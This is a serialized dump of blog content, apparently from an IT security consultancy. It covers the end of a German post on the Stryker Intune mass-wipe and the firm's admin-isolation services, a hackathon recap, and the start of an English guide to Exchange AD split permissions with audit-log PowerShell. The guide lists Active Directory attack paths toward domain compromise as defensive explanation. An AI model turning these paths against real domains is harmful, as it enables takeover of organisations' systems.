Endpoint-Management-Risiken","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[1671,4036,4038],{"id":4037},"managed-red-tenant-den-administrativen-kontext-schützen","Managed Red Tenant: den administrativen Kontext schützen",[806,4040,1536],{},[806,4042,4043,4044,4046],{},"Die erste Ebene ist die vollständige Isolierung des privilegierten Zugangs. Dafür ist unser ",[833,4045,394],{"href":395}," konzipiert.",[806,4048,4049],{},"Der Managed Red Tenant bietet eine vollständig isolierte, cloudbasierte administrative Umgebung – einen dedizierten Microsoft Entra-Tenant („der Red Tenant\"), der ausschließlich für privilegierte Operationen genutzt wird. Administrative Identitäten leben hier. Administrative Geräte werden hier verwaltet. Nichts aus der regulären Arbeitsumgebung fließt hinüber.",[806,4051,4052],{},"Für die kritischsten Rollen – jene mit Control-Plane-Zugang, wie Global Administratoren – implementieren wir den „Clean Keyboard\"-Ansatz: eine physische Privileged Admin Workstation (PAW) mit dedizierter Hardware, gehärteten Richtlinien und keinerlei Berührungspunkten mit dem alltäglichen Arbeitskontext. Für administrative Rollen unterhalb der Control Plane bieten wir skalierbare Virtual Access Workstations (VAW) an, die auf einer gehärteten Azure Virtual Desktop-Infrastruktur innerhalb des Red Tenants aufgebaut sind. Der Zugriffspfad selbst ist durch Microsoft Entra Private Access geschützt, mit Zero Trust Network Access und Conditional Access-Richtlinien, bevor eine Sitzung hergestellt werden kann.",[806,4054,4055],{},"Microsoft Entra Internet Access blockiert den öffentlichen Internetzugang aus administrativen Sitzungen und beschränkt die Verbindungen strikt auf privilegierte Schnittstellen und autorisierte Tenant-Umgebungen. Nahezu Echtzeit-Sitzungswiderruf ist durch Universal Conditional Access Evaluation möglich, was bedeutet, dass ein widerrufenes Credential nicht als gültige Sitzung weiterbesteht.",[806,4057,4058,4059,4062],{},"Der Managed Red Tenant wird rund um die Uhr von unserem ",[833,4060,4061],{"href":423},"Cloud Security Operations Center (CSOC)"," überwacht, mit speziell entwickelten Erkennungen, die gezielt auf administrative Berechtigungen und Zugriffsmuster ausgerichtet sind. Ein Angreifer, der irgendwie ein Credential in dieser Umgebung kompromittiert, hätte nicht drei unentdeckte Stunden, um Wipe-Befehle über eine globale Geräteflotte auszuführen.",[806,4064,4065],{},"Das ist besonders relevant für Rollen wie Intune-Administratoren. Sie wissen, wie man Clients sichert, aber die Absicherung einer privilegierten Admin-Workstation erfordert andere Fähigkeiten: Enterprise Access Architecture, Identity Hardening, Zero Trust Controls. Diese liegen typischerweise beim Sicherheitsteam. Ein Managed Red Tenant nimmt diese Last vollständig ab: Intune-Admins erhalten eine professionell verwaltete, konsistent gehärtete Workstation, ohne selbst zu Experten für Sicherheits-Workstations werden zu müssen. Das gilt für jede hochprivilegierte Rolle in der Organisation.",[4067,4068],"video-frame",{"thumb":4069,"alt":4070,"id":4071,":full-width":1435},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer und Thomas Naunheim diskutieren die Managed Red Tenant-Cybersicherheitsstrategie","rOEIvItNkjE",[1541,4073,4075,4076],{"style":4074},"background:var(--color-gk-light-grey); margin-top:0.5rem; padding:0.5rem 1rem; font-size:0.85rem; color:var(--color-gk-dark-blue)","Mehr auf unserem ",[833,4077,4080],{"href":4078,"target":513,"rel":4079},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[3867],"YouTube-Kanal",[1671,4082,4084],{"id":4083},"managed-intune-die-management-ebene-selbst-absichern","Managed Intune: die Management-Ebene selbst absichern",[806,4086,1536],{},[806,4088,4089,4090,4092],{},"Die zweite Ebene ist sicherzustellen, dass Intune – das Tool, das beim Stryker-Angriff als Waffe eingesetzt wurde – nach höchstem Sicherheitsstandard konfiguriert, betrieben und kontinuierlich gepflegt wird. Dafür ist unser ",[833,4091,45],{"href":46},"-Service zuständig.",[806,4094,4095],{},"Eine der zentralen Erkenntnisse aus Vorfällen wie diesem ist, dass Organisationen häufig Intune-Umgebungen erben, die organisch gewachsen sind: Richtlinien auf Richtlinien gestapelt, manuelle Änderungen über das Portal, die schwer zu prüfen sind, und Sicherheits-Baselines, die mit Microsofts eigenen, sich weiterentwickelnden Empfehlungen nicht Schritt gehalten haben. Genau diese Art von Umgebung ist es, in der Konfigurationsdrift ausnutzbare Lücken schafft.",[806,4097,4098,4099,4104],{},"Microsoft hat kürzlich ",[833,4100,4103],{"href":4101,"rel":4102},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[1410],"Best Practices für die Absicherung von Microsoft Intune"," veröffentlicht – ein Signal, dass auch Microsoft Intune-Härtung als Thema betrachtet, das branchenweit explizite Aufmerksamkeit erfordert. Unser Managed Intune-Service basiert auf diesen Prinzipien, und wir haben Microsofts Empfehlungen als Teil unserer Baseline implementiert.",[806,4106,4107],{},"Unser Managed Intune-Service basiert auf der glueckkanja Intune Foundation: ein bewährter, kontinuierlich gepflegter Satz von Best Practices für das Gerätemanagement, vollständig als Code mit Terraform und unserem eigenen TerraProvider bereitgestellt. Jede Änderung ist automatisiert, versionskontrolliert und prüfbar. Es gibt keine undokumentierten Click-through-Konfigurationen, die ein Angreifer ausnutzen könnte, indem er die Lücke zwischen dem Beabsichtigten und dem tatsächlich Gesetzten versteht.",[806,4109,4110],{},"Aus Sicherheitsperspektive bedeutet das, dass Zero Trust, App Protection Policies und Endpoint Security-Konfigurationen by Design konsistent angewendet werden – über Windows, macOS, iOS und Android – nicht als einmalige Bereitstellungen, sondern als kontinuierlich durchgesetzte, fortlaufend aktualisierte Baselines, die Microsofts eigene Sicherheitsleitlinien nachverfolgen.",[806,4112,4113],{},"Entscheidend ist, dass Managed Intune die betriebliche Reife widerspiegelt, die modernes Endpoint-Management erfordert: kontinuierliches Compliance-Monitoring, strukturierte Änderungsgovernance und regelmäßige Service-Reviews – nicht als optionale Extras, sondern als Baseline-Operationen. Aber die Intune-Konfiguration zu sichern ist nur die halbe Miete. Wenn der Administrator, der auf die Konsole zugreift, dies von einem ungeschützten Gerät aus tut, bleibt die Management-Ebene trotzdem exponiert – genau hier vervollständigt der Managed Red Tenant das Modell.",[806,4115,4116],{},"Da alle Konfigurationen als Code auf Basis der Intune Foundation bereitgestellt werden, setzen wir ein striktes Vier-Augen-Prinzip mit Peer Review, zusätzlicher automatisierter Validierung und kontrollierten Deployment-Pipelines durch. Das eliminiert nicht verwaltete Portal-Änderungen innerhalb der Intune Foundation und stellt eine konsistente, prüfbare und sichere Baseline über alle Geräte hinweg sicher.",[806,4118,4119],{},"Der administrative Zugang wird durch ein Least-Privilege-Modell mit GDAP und Azure Lighthouse gesteuert, mit klar definierten Verantwortlichkeiten und eng begrenztem Zugang zum Kunden-Tenant. Das reduziert die mit privilegierten Operationen verbundene Angriffsfläche erheblich.",[806,4121,4122],{},"Aktionen auf Geräteebene, einschließlich destruktiver Operationen, verbleiben in der Verantwortung des Kunden, da ihre Ausführung eng mit organisationsspezifischen Prozessen und internen Governance-Frameworks verbunden ist. Microsoft und CISA empfehlen, solche Aktionen durch zusätzliche Schutzmaßnahmen zu sichern, beispielsweise durch Multi-Admin-Genehmigungskontrollen in Intune.",[810,4124,4126],{"id":4125},"die-unbequeme-frage","Die unbequeme Frage",[806,4128,816],{},[806,4130,4131],{},"Der Stryker-Angriff ist keine Anklage gegen Microsoft Intune. Intune hat sich genau so verhalten, wie es konzipiert wurde. Es führte die Befehle aus, die es von einem authentifizierten Administrator erhielt. Das Versagen lag nicht im Tool. Es lag im Fehlen von Kontrollen darüber, wer dieses Tool erreichen konnte, aus welchem Kontext heraus und mit welchem Autorisierungsgrad.",[806,4133,4134],{},"Das ist ein Governance- und Architekturproblem. Und es ist dasselbe Problem, das in den meisten Organisationen besteht, die heute Microsoft 365 betreiben.",[806,4136,4137],{},"Wenn Ihre Administratoren auf Intune, Entra ID oder Azure von denselben Geräten und Identitäten zugreifen, die sie für die alltägliche Arbeit verwenden – und wenn Ihre Intune-Umgebung über Jahre manueller Portal-Änderungen gewachsen ist anstatt durch ein strukturiertes, automatisiertes Betriebsmodell – tragen Sie dasselbe strukturelle Risiko, das Stryker am 11. März trug. Die Frage ist, ob ein Angreifer diese Schwachstelle finden wird, bevor Sie sie schließen.",[806,4139,4140,4142,4143,4145],{},[833,4141,394],{"href":395}," adressiert die Privilege- und Identitätsebene. ",[833,4144,45],{"href":46}," adressiert die Konfigurations- und Betriebsebene. Zusammen schließen sie die zwei Lücken, die den Stryker-Angriff möglich gemacht haben.",[806,4147,4148],{},"Wenn Sie verstehen möchten, wie einer der Services auf Ihre aktuelle Umgebung zutrifft oder wo Ihre konkreten Schwachstellen liegen, sprechen wir gerne darüber.",[806,4150,4151],{},"Wir werden in Kürze auch einen Deep-Dive-Artikel veröffentlichen, der untersucht, wie der Stryker-Vorfall überhaupt möglich sein konnte.",[810,4153,4155],{"id":4154},"weitere-informationen","Weitere Informationen",[806,4157,816],{},[2738,4159,4160,4167,4173,4180],{},[2741,4161,4162],{},[833,4163,4166],{"href":4164,"rel":4165},"https://www.cisa.gov/secure-cloud-business-applications",[1410],"CISA: Securing Cloud Business Applications",[2741,4168,4169],{},[833,4170,4172],{"href":4101,"rel":4171},[1410],"Microsoft: Best Practices für die Absicherung von Microsoft Intune",[2741,4174,4175],{},[833,4176,4179],{"href":4177,"rel":4178},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[1410],"TechCrunch: CISA fordert Unternehmen auf, Microsoft Intune-Systeme zu sichern, nachdem Hacker Stryker-Geräte massenhaft gelöscht haben",[2741,4181,4182],{},[833,4183,4186],{"href":4184,"rel":4185},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[1410],"Managed Red Tenant im Azure Marketplace",{"title":863,"searchDepth":864,"depth":864,"links":4188},[4189,4190,4191,4192,4193,4197,4198],{"id":3965,"depth":864,"text":3966},{"id":3977,"depth":864,"text":3978},{"id":3995,"depth":864,"text":3996},{"id":4007,"depth":864,"text":4008},{"id":4022,"depth":864,"text":4023,"children":4194},[4195,4196],{"id":4037,"depth":1814,"text":4038},{"id":4083,"depth":1814,"text":4084},{"id":4125,"depth":864,"text":4126},{"id":4154,"depth":864,"text":4155},{"lang":4,"seoTitle":4200,"titleClass":873,"date":4201,"categories":4202,"blogtitlepic":4203,"socialimg":4204,"customExcerpt":4205,"keywords":4206,"hreflang":4207,"asideNav":4214,"contactInContent":4229,"maxContent":749,"published":508},"Der Stryker-Angriff: Wie ein kompromittiertes Admin-Konto 80.000 Geräte über Intune löschte","2026-03-20",[371],"head-stryker.jpg","/blog/heads/head-stryker.jpg","Am 11. März 2026 löschte Handala Geräte in 79 Ländern, und alles, was dafür nötig war, war ein kompromittiertes Intune-Admin-Konto. Keine Malware, kein Exploit, nur legitime Management-Tools, gegen ihre Besitzer gerichtet. Was passiert ist, warum es funktioniert hat und welche zwei architektonischen Lücken geschlossen werden müssen.","Stryker-Angriff, Handala, Microsoft Intune Wipe, Privileged Access Management, Admin-Workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, Endpoint-Management-Sicherheit",[4208,4210,4212],{"lang":4,"href":4209},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":956,"href":4211},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":953,"href":4213},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":4215},[4216,4218,4220,4222,4225,4227],{"href":4217,"text":3966},"#was-wirklich-passiert-ist",{"href":4219,"text":3978},"#warum-dieser-angriff-erfolgreich-war",{"href":4221,"text":3996},"#cisa-hat-genug-gesehen",{"href":4223,"text":4224},"#trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus",{"href":4226,"text":4023},"#zwei-verteidigungsebenen",{"href":4228,"text":4126},"#die-unbequeme-frage",{"quote":508,"infos":4230},{"bgColor":883,"headline":3669,"subline":4231,"level":810,"textStyling":887,"flush":888,"person":4232,"form":4234},"Möchten Sie wissen, wie Managed Red Tenant und Managed Intune die Lücken schließen, die der Stryker-Angriff ausgenutzt hat? Füllen Sie das Formular aus und wir erläutern Ihnen, wie es auf Ihre Umgebung zutrifft.",{"image":3672,"cloudinary":508,"alt":3673,"name":1127,"quotee":1127,"quoteeTitle":3674,"quote":4233},"Das Tool hat genau das getan, was man ihm gesagt hat. Das Problem war, dass niemand hätte in der Lage sein sollen, ihm das zu sagen – nicht von einem kompromittierten Alltags-Konto aus, nicht ohne eine zweite Genehmigung, nicht ohne eine isolierte administrative Umgebung. Das ist die Lücke, bei deren Schließung wir Organisationen helfen.",{"ctaText":905,"cta":4235,"method":870,"action":908,"fields":4236},{"skin":907},[4237,4238,4240,4242,4244,4247,4249,4250,4251,4253,4254,4255],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":4239},"Bitte geben Sie Ihren Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":4241},"Bitte geben Sie Ihr Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":4243},"Bitte geben Sie Ihre E-Mail-Adresse ein.",{"label":4245,"type":928,"id":929,"required":749,"requiredMsg":4246},"Ihre Nachricht an uns","Bitte geben Sie eine Nachricht ein.",{"label":4248,"type":933,"id":934,"required":508,"requiredMsg":935},"Ihre Daten werden gespeichert und zur Beantwortung Ihrer Anfrage verwendet. Weitere Informationen finden Sie in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":4252},"Form: Blog Stryker Attack Intune Privilege | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":3953,"description":3959},"posts/2026-03-20-stryker-attack-intune-privilege",[103,4260,4261],"Privileged Access","Zero Trust","zy02he8Pegg9x8cCjPWcEYmTfzkYQVnYgWhO_Clfueo",{"id":4264,"title":4265,"author":4266,"body":4267,"cta":764,"description":4271,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4303,"moment":4305,"navigation":508,"path":4318,"seo":4319,"stem":4320,"tags":4321,"webcast":749,"__hash__":4325},"content_de/posts/2026-03-16-ai-agent-hackathon.md","Sechs Agents. Vier Wochen. Echter Betrieb.",[801],{"type":803,"value":4268,"toc":4301},[4269,4272,4275,4278,4281,4284,4289,4292,4295,4298],[806,4270,4271],{},"Wie viele Stunden verbringt eure IT-Abteilung pro Woche mit Aufgaben, die ein Agent in Minuten erledigen könnte?",[806,4273,4274],{},"Es gibt in der deutschen Unternehmenslandschaft einen Prozess, den fast jede IT-Abteilung kennt: Jemand liest Verträge. Jemand anderes sortiert Anforderungen in Kategorien. Wieder jemand beantwortet dieselben Fragen zu Lieferungen, die gestern schon jemand beantwortet hat. Es sind keine glamourösen Probleme. Aber es sind die, die in Summe Zehntausende Stunden im Jahr kosten und die sich erstaunlich gut für AI Agents eignen, wenn man weiß, wo man den Hebel ansetzt.",[806,4276,4277],{},"Sechs Unternehmen haben im Februar bei uns in Offenbach genau das getan. Kiekert lässt Anforderungen im R&D jetzt regelbasiert kategorisieren, mit Confidence Score und Feedback-Loop. Der Agent läuft bereits produktiv. Dr. Oetker hat einen Contract Review Assistant gebaut, der IT-Verträge auf kritische Klauseln prüft und einen strukturierten Prüfbericht für Einkauf und Legal erstellt. Eckes-Granini ist gleich mit zwei Agents angetreten: einem Onboarding-Agenten, der neue Mitarbeitende ab dem ersten Login durch MFA, Office-Setup und Sicherheitsrichtlinien führt, und einem Logistik-Agenten, der Disponenten Fragen zu Sendungen, Tarifen und Spediteuren beantwortet. igefa hat einen sprachbasierten Hotline-Agenten für den internen IT-Support entwickelt, angebunden an JIRA und Confluence. Und die lila logistik hat das vielleicht ungewöhnlichste Projekt mitgebracht: einen Use Case Generator, der in SharePoint und Exchange beobachtet, wo Automatisierungspotenziale liegen, weil das eigentliche Problem oft nicht die Technologie ist, sondern dass niemand im Unternehmen die richtigen Stellen erkennt.",[806,4279,4280],{},"All das entstand im Copilot Studio, mit Agent Flows, Dataverse Anbindungen und MCP Connectoren, begleitet von vier unserer MVPs. Vier Wochen Build-Phase, neben dem normalen Tagesgeschäft. Die Teilnehmenden mussten sich jede Stunde dafür freischaufeln, neben Tickets, Quartalsabschlüssen und dem operativen Betrieb. Dass am Ende sechs funktionsfähige Agents standen, sagt weniger über die Technologie als über die Teams, die sie gebaut haben.",[806,4282,4283],{},"Am 10. März, Microsoft Office Frankfurt, dann die Probe: Sechs Präsentationen, je 20 Minuten, bewertet nach Business Impact, technischer Tiefe und dem Applaus des Publikums (ja, auch der steht auf dem Bewertungsbogen). Kiekert hat gewonnen, weil ihr Agent produktiv läuft, gebaut von jemandem aus der Fachabteilung, ohne IT-Hintergrund, ohne Vorerfahrung im Copilot Studio. Dr. Oetker, weil die Vertragsprüfung so universell ist, dass die Jury danach über die eigenen IT-Verträge nachdachte. Dass alle sechs Teams in vier Wochen neben dem Tagesgeschäft einen lauffähigen Agent gebaut haben: Das war am Ende die eigentliche Nachricht des Tages.",[4067,4285],{"thumb":4286,"alt":4287,"id":4288,":full-width":1435},"/thumbs/thumb-ai-agent-hackathon.jpg","Präsentation des glueckkanja AI Agent Hackathons im Microsoft Office Frankfurt: Sechs Teams zeigen ihre Copilot Studio Agents vor Publikum.","GjumQAnKj8k",[1541,4290,4291],{"style":4074},"glueckkanja AI Agent Hackathon – Sechs Unternehmen, sechs Agents, vier Wochen",[806,4293,4294],{},"Das Format heißt glueckkanja AI Agent Hackathon. Entstanden aus einem Microsoft Hackathon in München, bei dem wir mit Knorr-Bremse teilgenommen haben. Microsoft hat uns danach gebeten, es mit unseren Kunden weiterzuführen. Die Idee ist einfach: Unternehmen bewerben sich mit einem konkreten Prozess, der heute manuell läuft. Wir schärfen den Use Case, definieren die Architektur und bauen gemeinsam. Wer nicht gleich in den Hackathon einsteigen will: Wir machen auch Workshops, in denen wir Use Cases identifizieren und die Agent Architektur vorbereiten: als Einstieg oder als eigenständiges Format.",[806,4296,4297],{},"Der nächste glueckkanja AI Agent Hackathon startet im Herbst 2026. Die Registrierung ist offen. Wer vorher schon Use Cases identifizieren und die eigene Umgebung vorbereiten will: Wir machen das gerne. Sprecht uns an.",[806,4299,4300],{},"Danke an Sylvia und Miriam von Microsoft für das Vertrauen ins Format. An Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik für den Mut und den Einsatz. Und an unser glueckkanja-Team, dass ihr das möglich gemacht habt.",{"title":863,"searchDepth":864,"depth":864,"links":4302},[],{"lang":4,"seoTitle":4304,"titleClass":873,"date":4305,"categories":4306,"blogtitlepic":4307,"socialimg":4308,"customExcerpt":4309,"keywords":4310,"hreflang":4311,"published":508},"glueckkanja AI Agent Hackathon: Sechs Unternehmen bauen AI Agents mit Copilot Studio","2026-03-16",[876],"head-ai-agent-hackathon.jpg","/blog/heads/head-ai-agent-hackathon.jpg","Sechs Unternehmen, vier Wochen Build-Phase, sechs funktionierende AI Agents – das war der erste glueckkanja AI Agent Hackathon. Kiekert, Dr. Oetker, Eckes-Granini, igefa und die lila logistik haben im Copilot Studio Agents gebaut, die heute produktiv laufen. Was dabei entstand und wie das Format funktioniert.","AI Agent Hackathon, Copilot Studio, glueckkanja, AI Agents, Microsoft Copilot, Agent Flows, Dataverse, MCP Connector, Kiekert, Dr. Oetker, Eckes-Granini, igefa, lila logistik, AI Automatisierung, Unternehmens-KI, Prozessautomatisierung",[4312,4314,4316],{"lang":4,"href":4313},"/de/posts/2026-03-16-ai-agent-hackathon",{"lang":953,"href":4315},"/en/posts/2026-03-16-ai-agent-hackathon",{"lang":956,"href":4317},"/es/posts/2026-03-16-ai-agent-hackathon","/posts/2026-03-16-ai-agent-hackathon",{"title":4265,"description":4271},"posts/2026-03-16-ai-agent-hackathon",[965,4322,4323,4324],"Copilot Studio","Hackathon","AI Agents","AezE-PbU3R4HvvyLcY4iCjfmOojUoQr8V6qpK-hxp_Q",{"id":4327,"title":4328,"author":4329,"body":4330,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4989,"moment":4991,"navigation":508,"path":5016,"seo":5017,"stem":5018,"tags":764,"webcast":749,"__hash__":5019},"content_de/posts/2026-03-01-exchange-ad-split-permissions-hardening.md","Exchange AD Split Permissions without regrets",[1041],{"type":803,"value":4331,"toc":4976},[4332,4336,4339,4345,4350,4366,4369,4374,4377,4381,4389,4403,4409,4412,4417,4453,4476,4480,4488,4496,4501,4517,4521,4527,4531,4536,4594,4599,4636,4639,4643,4658,4665,4681,4690,4694,4697,4743,4746,4755,4764,4767,4782,4799,4812,4824,4829,4888,4892,4897,4917,4924,4948,4952,4955,4958,4973],[810,4333,4335],{"id":4334},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[806,4337,4338],{},"I found a way to re-grant AD and RBAC permissions directly where Exchange users, groups, and contacts reside, requiring no changes for admins or identity management systems. In my experience, that friction has been the primary blocker for most companies. And we still retain the security benefits against lateral movement and domain compromise.",[806,4340,4341],{},[1449,4342],{"alt":4343,"src":4344},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[806,4346,4347],{},[1736,4348,4349],{},"It’s achieved in three steps:",[4351,4352,4353,4360,4363],"ol",{"style":3756},[2741,4354,4355,4356],{},"Implement ",[833,4357,4359],{"href":4358},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions","AD split permission model",[2741,4361,4362],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[2741,4364,4365],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[806,4367,4368],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[4067,4370],{"thumb":4371,"alt":4372,"id":4373,":full-width":1435},"/thumbs/thumb-exchange-ad-split-permissions-webcast.jpg","A presenter sits in front of a laptop explaining a slide titled Step 1: Active Directory Permissions by glueckkanja. The slide covers how to implement Microsoft Exchange AD Split Permissions, including PowerShell commands for creating a delegation group (New-ADGroup, Add-ADGroupMember) and applying permissions via the script Add-ExchangeADSplitPermissionOnOU.ps1.","soNZkNRopSQ",[1541,4375,4376],{"style":4074},"Webcast: Exchange AD Split Permissions without regrets. A Step-by-step implementation guide",[810,4378,4380],{"id":4379},"why-do-we-care-now","Why do we care (now)?",[806,4382,4383,4384,4386,4388],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk of Active Directory takeover. Combined with Exchange being notorious for remote exploits the last few years, it’s time to act!",[2016,4385],{},[2016,4387],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[2738,4390,4391,4394,4397,4400],{"style":3756},[2741,4392,4393],{},"modify permissions on users and groups (effectively full access)",[2741,4395,4396],{},"modify group members",[2741,4398,4399],{},"reset password on users",[2741,4401,4402],{},"create/delete users and groups",[806,4404,4405],{},[1449,4406],{"alt":4407,"src":4408},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[806,4410,4411],{},"Only certain highly privileged Tier 0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[806,4413,4414],{},[1736,4415,4416],{},"Prominent examples:",[2738,4418,4419,4422,4442],{"style":3756},[2741,4420,4421],{},"Entra Connect Sync account when using Password Hash Sync",[2741,4423,4424,4425],{},"Default groups",[2738,4426,4428,4431,4439],{"style":4427},"margin: 0",[2741,4429,4430],{},"Allowed RODC Password Replication Group together with Entra Connect account (if a real Windows RODC exists)",[2741,4432,4433,4434,4438],{},"Also see ",[833,4435,4437],{"href":4436,"target":513},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta","Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[2741,4440,4441],{},"Emptying Protected Users to create attack vectors by removing protections",[2741,4443,4444,4445],{},"Unprotected custom groups or admin/service accounts",[2738,4446,4447,4450],{"style":4427},[2741,4448,4449],{},"Write permission on GPOs (applying to domain controller)",[2741,4451,4452],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[806,4454,4455,4456,4458,4460,4461,4466,4468,4470,4471],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU, you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2016,4457],{},[2016,4459],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[833,4462,4465],{"href":4463,"rel":4464},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[1410],"Configure Exchange Server for split permissions | Microsoft Learn",[2016,4467],{},[2016,4469],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[833,4472,4475],{"href":4473,"rel":4474},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[1410],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[810,4477,4479],{"id":4478},"but-why-is-no-one-doing-it","But why is no one doing it?",[806,4481,4482,4483,4485,4487],{},"As split permissions weren’t available until Exchange 2010 SP1, everyone had accepted it by then and it seems that security teams did not manage to push it successfully once it existed.",[2016,4484],{},[2016,4486],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[3587,4489,4490],{},[806,4491,4492,4495],{},[1736,4493,4494],{},"Info:"," The following cmdlets will no longer be available or working: Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission",[806,4497,4498],{},[1736,4499,4500],{},"Adoption examples:",[2738,4502,4503,4514],{"style":3756},[2741,4504,4505,4506],{},"New-Mailbox (where Exchange writes to AD) would be:",[2738,4507,4508,4511],{"style":4427},[2741,4509,4510],{},"New-ADUser (where adm.jdoe writes to AD)",[2741,4512,4513],{},"Enable-Mailbox",[2741,4515,4516],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[810,4518,4520],{"id":4519},"show-me-this-no-regrets-option","Show me this no-regrets option!",[806,4522,4523,4526],{},[1736,4524,4525],{},"Disclaimer",": Please fully read and understand the following links and articles, perform it in a test environment first, make sure AD backups are current and recovery practices are established!",[1671,4528,4530],{"id":4529},"audit-current-usage","Audit current usage",[806,4532,4533],{},[1736,4534,4535],{},"You should first check which of the affected cmdlets are in use on which OUs:",[2009,4537,4538,4545,4547,4553,4555],{},[1588,4539,4540,4544],{},[1588,4541,4543],{"style":4542},"color:var(--color-gk-orange)","$CsvPath"," = \"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[2016,4546],{},[1588,4548,4549,4552],{},[1588,4550,4551],{"style":4542},"$Cmdlets"," = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[2016,4554],{},[1588,4556,4557,2025,4560,4564,4565,2025,4568,4570,4571,4574,4575,2025,4578,2025,4581,2025,4583,4586,4587,4590,4591],{},[1588,4558,4559],{"style":4542},"Search-AdminAuditLog",[1588,4561,4563],{"style":4562},"color:var(--color-gk-mid-blue)","-ResultSize"," 99000 ",[1588,4566,4567],{"style":4562},"-Cmdlets",[1588,4569,4551],{"style":4542}," | ",[1588,4572,4573],{"style":4542},"Select-Object"," RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($\\_.CmdletParameters))}},succeeded,error | ",[1588,4576,4577],{"style":4542},"Export-Csv",[1588,4579,4580],{"style":4562},"-Path",[1588,4582,4543],{"style":4542},[1588,4584,4585],{"style":4562},"-Delimiter"," \";\" ",[1588,4588,4589],{"style":4562},"-Encoding"," Unicode ",[1588,4592,4593],{"style":4562},"-NoTypeInformation",[806,4595,4596],{},[1736,4597,4598],{},"Quick Analysis of caller and cmdlets:",[2009,4600,4601,4617,4619,4627,4629],{},[1588,4602,4603,4606,4607,2025,4610,2025,4612,2025,4614,4616],{},[1588,4604,4605],{"style":4542},"$CSVs"," = ",[1588,4608,4609],{"style":4542},"Import-Csv",[1588,4611,4580],{"style":4562},[1588,4613,4543],{"style":4542},[1588,4615,4585],{"style":4562}," \";\"",[2016,4618],{},[1588,4620,4621,4570,4623,4626],{},[1588,4622,4605],{"style":4542},[1588,4624,4625],{"style":4542},"Group-Object"," Caller",[2016,4628],{},[1588,4630,4631,4570,4633,4635],{},[1588,4632,4605],{"style":4542},[1588,4634,4625],{"style":4542}," CmdletName",[806,4637,4638],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange-relevant groups into dedicated 